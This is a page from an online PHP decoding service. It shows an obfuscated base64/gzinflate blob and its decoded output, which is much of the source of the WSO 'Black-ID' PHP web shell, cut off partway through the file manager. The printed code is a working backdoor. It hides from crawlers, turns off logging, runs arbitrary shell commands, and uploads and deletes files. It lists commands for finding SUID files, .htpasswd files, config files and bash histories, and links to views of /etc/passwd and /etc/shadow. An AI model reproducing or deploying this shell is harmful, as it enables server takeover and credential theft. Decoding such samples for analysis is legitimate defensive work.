Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
echo(gzinflate(base64_decode('7X37d9s4zujP3XP2f2A12ZHdOn6l6Xbi2H3k0abTJp0kfSa5XtmWbU1kySPJ..
Decoded Output download
b'echo "<link rel=\'shortcut icon\' href=\'http://www.dz-streaming.eu/favicon.ico\'>
<style type=\'text/css\'>
input[type=submit], input[type=button], input[type=reset]{
text-align:center;
background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#CCCCCC;
border-top-color:#565656;
padding:4px 6px;
margin:4px 5px;
height:16px;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
text-shadow:0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:23px;
}
input[type=submit]:hover , input[type=button]:hover, input[type=reset]:hover{
background-position:center top;
text-decoration:none;
}
input[type=text], input[type=password]{
background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#CCCCCC;
border-top-color:#565656;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:18px;
margin-left: 5px;
}
input , textarea , button , body , caption , table ,area , option {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
border:1px solid rgba(0,0,0, 0.2);
/* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
}
input , textarea {
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #333333;\';
}
input:focus, textarea:focus ,button:active , body:focus , caption:focus , table:focus ,area:focus ,option:focus {
box-shadow: 0 0 5px rgba(0, 0, 255, 1);
-webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
-moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
border: 1px solid #CCCC00;
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #333333;\';
overflow: auto;
/* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
}
body{
/* font-family : Verdana; */
color : #f9f6f1;
font-size : 0.7em;
background: url(http://i44.tinypic.com/i56tc9.jpg) no-repeat center top #252525;
}
input , textarea {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
border:1px solid rgba(0,0,0, 0.2);
}
input:focus, textarea:focus {
outline: 0;
border-color: rgba(82, 168, 236, 0.8);
-webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
-moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #333333;\';
overflow: auto;
}
</style>
";
$_SESSION[$_SERVER[\'HTTP_HOST\']] = true;
$color = "#df5"; //Colour
$default_action = "FilesMan";
$default_charset = "Windows-1251";
if( !empty($_SERVER[\'HTTP_USER_AGENT\']) ) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
foreach($userAgents as $agent)
if( strpos($_SERVER[\'HTTP_USER_AGENT\'], $agent) !== false ) {
header(\'HTTP/1.0 404 Not Found\');
exit;
}
}
@session_start();
@error_reporting(0);
@ini_set(\'error_log\',NULL);
@ini_set(\'log_errors\',0);
@ini_set(\'max_execution_time\',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define(\'VERSION\', \'3.0\');
if( get_magic_quotes_gpc() ) {
function WSOstripslashes($array) {
return is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
}
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
$os = \'win\';
else
$os = \'nix\';
$safe_mode = @ini_get(\'safe_mode\');
$disable_functions = @ini_get(\'disable_functions\');
$home_cwd = @getcwd();
if( isset( $_POST[\'c\'] ) )
@chdir($_POST[\'c\']);
$cwd = @getcwd();
if( $os == \'win\') {
$home_cwd = str_replace("\", "/", $home_cwd);
$cwd = str_replace("\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != \'/\' )
$cwd .= \'/\';
if($os == \'win\')
$aliases = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else
$aliases = array(
"List dir" => "ls -lha",
"list file attributes on a Linux second extended file system" => "lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" => "find . -type f -name \"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files"=>"locate \'.conf\'",
"locate .pwd files" => "locate \'.pwd\'",
"locate .sql files" => "locate \'.sql\'",
"locate .htpasswd files" => "locate \'.htpasswd\'",
"locate .bash_history files" => "locate \'.bash_history\'",
"locate .mysql_history files" => "locate \'.mysql_history\'",
"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv"
);
function wsoHeader() {
if(empty($_POST[\'charset\']))
$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];
global $color;
echo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . "- WSO [Black-ID] " . VERSION ."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,\'Courier New\'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';
var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'
var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';
var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"
")!==false)?\'\':addslashes(htmlspecialchars($_POST[\'p1\']))) ."\';
var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"
")!==false)?\'\':addslashes(htmlspecialchars(@$_POST[\'p2\']))) ."\';
var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"
")!==false)?\'\':addslashes(htmlspecialchars(@$_POST[\'p3\']))) ."\';
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = \'ajax=true\';
for(i=0;i<document.mf.elements.length;i++)
params += \'&\'+document.mf.elements[i].name+\'=\'+encodeURIComponent(document.mf.elements[i].value);
sr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject(\'Microsoft.XMLHTTP\');
if (req) {
req.onreadystatechange = processReqChange;
req.open(\'POST\', url, true);
req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\\d+)([\\S\\s]*)\", \'m\');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert(\'Request error!\');
}
</script>
<head><body><div style=\'position:absolute;width:100%;background-color:#444;top:0;left:0;\'>
<form method=post name=mf style=\'display:none;\'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);
$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname(\'r\');
$kernel = @php_uname(\'s\');
$exdblink = \'http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=\';
if( strpos(\'Linux\', $kernel) !== false )
$exdblink .= urlencode( \'Linux Kernel \' . substr($release,0,6) );
else
$exdblink .= urlencode( $kernel . \' \' . substr($release,0,3) );
if(!function_exists(\'posix_getegid\')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid[\'name\'];
$uid = $uid[\'uid\'];
$group = $gid[\'name\'];
$gid = $gid[\'gid\'];
}
$cwd_links = \'\';
$path = explode("/", $GLOBALS[\'cwd\']);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= "<a href=\'#\' onclick=\'g(\"FilesMan\",\"";
for($j=0;$j<=$i;$j++)
$cwd_links .= $path[$j].\'/\';
$cwd_links .= "\")\'>".$path[$i]."/</a>";
}
$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');
$opt_charsets = \'\';
foreach($charsets as $item)
$opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';
$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Mass\'=>\'Mass\',\'Domains\'=>\'Domain\',\'Sql\'=>\'Sql\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Network\'=>\'Network\');
$m[\'Self remove\'] = \'SelfRemove\';
$menu = \'\';
foreach($m as $k => $v)
$menu .= \'<th width="\'.(int)(100/count($m)).\'%">[<a href="#" onclick="g(\'\'.$v.\'\',null,\'\',\'\',\'\')">\'.$k.\'</a>]</th>\';
$drives = "";
if ($GLOBALS[\'os\'] == \'win\') {
foreach( range(\'c\',\'z\') as $drive )
if (is_dir($drive.\':\\'))
$drives .= \'<a href="#" onclick="g(\'FilesMan\',\'\'.$drive.\':/\')">[ \'.$drive.\' ]</a> \';
}
echo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\'.($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\').\'</span></td>\'.
\'<td><nobr>\'.substr(@php_uname(), 0, 120).\' <a href="http://www.google.com/search?q=\'.urlencode(@php_uname()).\'" target="_blank">[Google]</a> <a href="\'.$exdblink.\'" target=_blank>[Exploit-DB]</a></nobr><br>\'.$uid.\' ( \'.$user.\' ) <span>Group:</span> \'.$gid.\' ( \'.$group.\' )<br>\'.@phpversion().\' <span>Safe mode:</span> \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=#00bb00><b>OFF</b></font>\').\' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> \'.date(\'Y-m-d H:i:s\').\'<br>\'.wsoViewSize($totalSpace).\' <span>Free:</span> \'.wsoViewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>\'.$cwd_links.\' \'.wsoPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\'FilesMan\',\'\'.$GLOBALS[\'home_cwd\'].\'\',\'\',\'\',\'\')">[ home ]</a><br>\'.$drives.\'</td>\'.
\'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">\'.$opt_charsets.\'</optgroup></select><br><span>Server IP:</span><br>\'.@$_SERVER["SERVER_ADDR"].\'<br><span>Client IP:</span><br>\'.$_SERVER[\'REMOTE_ADDR\'].\'<br><a href="http://www.bing.com/search?q=ip:\' . @$_SERVER["SERVER_ADDR"] . \'" target=_blank>[ Bing ]</a> | <a href="http://www.zone-h.org/archive/ip=\' . @$_SERVER["SERVER_ADDR"] . \'" target=_blank>[ Zone-H ]</a><br></nobr></td></tr></table>\'.
\'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>\'.$menu.\'</tr></table><div style="margin:5">\';
}
function wsoFooter() {
$is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style=\'border-top:2px solid #333;border-bottom:2px solid #333;\'>
<tr>
<td><form onsubmit=\'g(null,this.c.value);return false;\'><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'>>\'></form></td>
<td><form onsubmit=\"g(\'FilesTools\',null,this.f.value);return false;\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>
</tr><tr>
<td><form onsubmit=\"g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;\"><span>Make dir:</span><br><input class=\'toolsInp\' type=text name=d><input type=submit value=\'>>\'></form>$is_writable</td>
<td><form onsubmit=\"g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;\"><span>Make file:</span><br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>$is_writable</td>
</tr><tr>
<td><form onsubmit=\"g(\'Console\',null,this.c.value);return false;\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'>>\'></form></td>
<td><form method=\'post\' ENCTYPE=\'multipart/form-data\'>
<input type=hidden name=a value=\'FilesMAn\'>
<input type=hidden name=c value=\'" . $GLOBALS[\'cwd\'] ."\'>
<input type=hidden name=p1 value=\'uploadFile\'>
<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>
<span>Upload file:</span><br><input class=\'toolsInp\' type=file name=f><input type=submit value=\'>>\'></form>$is_writable</td>
</tr></table></div></body></html>";
}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false; } }
function wsoEx($in) {
$out = \'\';
if(function_exists(\'exec\')) {
@exec($in,$out);
$out = @join("
",$out);
}elseif(function_exists(\'passthru\')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists(\'system\')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists(\'shell_exec\')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function wsoViewSize($s) {
if($s >= 1073741824)
return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';
elseif($s >= 1048576)
return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';
elseif($s >= 1024)
return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';
else
return $s . \' B\';
}
function wsoPerms($p) {
if (($p & 0xC000) == 0xC000)$i = \'s\';
elseif (($p & 0xA000) == 0xA000)$i = \'l\';
elseif (($p & 0x8000) == 0x8000)$i = \'-\';
elseif (($p & 0x6000) == 0x6000)$i = \'b\';
elseif (($p & 0x4000) == 0x4000)$i = \'d\';
elseif (($p & 0x2000) == 0x2000)$i = \'c\';
elseif (($p & 0x1000) == 0x1000)$i = \'p\';
else $i = \'u\';
$i .= (($p & 0x0100) ? \'r\' : \'-\');
$i .= (($p & 0x0080) ? \'w\' : \'-\');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));
$i .= (($p & 0x0020) ? \'r\' : \'-\');
$i .= (($p & 0x0010) ? \'w\' : \'-\');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));
$i .= (($p & 0x0004) ? \'r\' : \'-\');
$i .= (($p & 0x0002) ? \'w\' : \'-\');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));
return $i;
}
function wsoPermsColor($f) {
if (!@is_readable($f))
return \'<font color=#FF0000>\'.wsoPerms(@fileperms($f)).\'</font>\';
elseif (!@is_writable($f))
return \'<font color=white>\'.wsoPerms(@fileperms($f)).\'</font>\';
else
return \'<font color=#00BB00>\'.wsoPerms(@fileperms($f)).\'</font>\';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function wsoWhich($p) {
$path = wsoEx(\'which \'.$p);
if(!empty($path))
return $path;
return false;
}
function actionSecInfo() {
wsoHeader();
echo \'<h1>Server security information</h1><div class=content>\';
function wsoSecParam($n, $v) {
$v = trim($v);
if($v) {
echo \'<span>\'.$n.\': </span>\';
if(strpos($v, "
") === false)
echo $v.\'<br>\';
else
echo \'<pre class=ml1>\'.$v.\'</pre>\';
}
}
wsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));
wsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');
wsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));
wsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));
wsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));
wsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');
$temp=array();
if(function_exists(\'mysql_get_client_info\'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists(\'mssql_connect\'))
$temp[] = "MSSQL";
if(function_exists(\'pg_connect\'))
$temp[] = "PostgreSQL";
if(function_exists(\'oci_connect\'))
$temp[] = "Oracle";
wsoSecParam(\'Supported databases\', implode(\', \', $temp));
echo \'<br>\';
if( $GLOBALS[\'os\'] == \'nix\' ) {
$userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');
$danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');
$downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');
wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\"FilesTools\", \"/etc/\", \"passwd\")\'>[view]</a>":\'no\');
wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\"FilesTools\", \"etc\", \"shadow\")\'>[view]</a>":\'no\');
wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));
wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));
if(!$GLOBALS[\'safe_mode\']) {
echo \'<br>\';
$temp=array();
foreach ($userful as $item)
if(wsoWhich($item)){$temp[]=$item;}
wsoSecParam(\'Userful\', implode(\', \',$temp));
$temp=array();
foreach ($danger as $item)
if(wsoWhich($item)){$temp[]=$item;}
wsoSecParam(\'Danger\', implode(\', \',$temp));
$temp=array();
foreach ($downloaders as $item)
if(wsoWhich($item)){$temp[]=$item;}
wsoSecParam(\'Downloaders\', implode(\', \',$temp));
echo \'<br/>\';
wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));
wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));
}
} else {
wsoSecParam(\'OS Version\',wsoEx(\'ver\'));
wsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));
wsoSecParam(\'User Accounts\',wsoEx(\'net user\'));
}
echo \'</div>\';
wsoFooter();
}
function actionFilesMan() {
wsoHeader();
echo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';
if(!empty($_POST[\'p1\'])) {
switch($_POST[\'p1\']) {
case \'uploadFile\':
if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))
echo "Can\'t upload file!";
break;
case \'mkdir\':
if(!@mkdir($_POST[\'p2\']))
echo "Can\'t create new dir";
break;
case \'delete\':
function deleteDir($path) {
$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
rmdir($path);
}
if(is_array(@$_POST[\'f\']))
foreach($_POST[\'f\'] as $f) {
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case \'paste\':
if($_SESSION[\'act\'] == \'copy\') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION[\'f\'] as $f)
copy_paste($_SESSION[\'c\'],$f, $GLOBALS[\'cwd\']);
} elseif($_SESSION[\'act\'] == \'move\') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');
}
} elseif(@is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION[\'f\'] as $f)
@rename($_SESSION[\'c\'].$f, $GLOBALS[\'cwd\'].$f);
} elseif($_SESSION[\'act\'] == \'zip\') {
if(class_exists(\'ZipArchive\')) {
$zip = new ZipArchive();
if ($zip->open(\'wso_\'.date("Ymd_His").\'.zip\', (int)@eval(\'return ZIPARCHIVE::CREATE;\'))) {
chdir($_SESSION[\'c\']);
foreach($_SESSION[\'f\'] as $f) {
if(@is_file($_SESSION[\'c\'].$f))
$zip->addFile($_SESSION[\'c\'].$f, $f);
elseif(@is_dir($_SESSION[\'c\'].$f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\'));
foreach ($iterator as $key=>$value) {
$zip->addFile(realpath($key), $key);
}
}
}
chdir($GLOBALS[\'cwd\']);
$zip->close();
}
}
} elseif($_SESSION[\'act\'] == \'unzip\') {
if(class_exists(\'ZipArchive\')) {
$zip = new ZipArchive();
foreach($_SESSION[\'f\'] as $f) {
if($zip->open($_SESSION[\'c\'].$f)) {
$zip->extractTo($GLOBALS[\'cwd\']);
$zip->close();
}
}
}
}
unset($_SESSION[\'f\']);
break;
default:
if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')||($_POST[\'p1\'] == \'zip\')||($_POST[\'p1\'] == \'unzip\')) ) {
$_SESSION[\'act\'] = @$_POST[\'p1\'];
$_SESSION[\'f\'] = @$_POST[\'f\'];
foreach($_SESSION[\'f\'] as $k => $f)
$_SESSION[\'f\'][$k] = urldecode($f);
$_SESSION[\'c\'] = @$_POST[\'c\'];
}
break;
}
}
$dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);
if($dirContent === false) { echo \'Can\'t open this folder!\';wsoFooter(); return; }
global $sort;
$sort = array(\'name\', 1);
if(!empty($_POST[\'p1\'])) {
if(preg_match(\'!s_([A-z]+)_(\d{1})!\', $_POST[\'p1\'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo "<script>
function sa() {
for(i=0;i<document.files.elements.length;i++)
if(document.files.elements[i].type == \'checkbox\')
document.files.elements[i].checked = document.files.elements[0].checked;
}
</script>
<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")\'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array(\'name\' => $dirContent[$i],
\'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],
\'modify\' => date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])),
\'perms\' => wsoPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]),
\'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),
\'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),
\'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i]))
$files[] = array_merge($tmp, array(\'type\' => \'file\'));
elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i]))
$dirs[] = array_merge($tmp, array(\'type\' => \'link\'));
elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));
}
$GLOBALS[\'sort\'] = $sort;
function wsoCmp($a, $b) {
if($GLOBALS[\'sort\'][0] != \'size\')
return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);
else
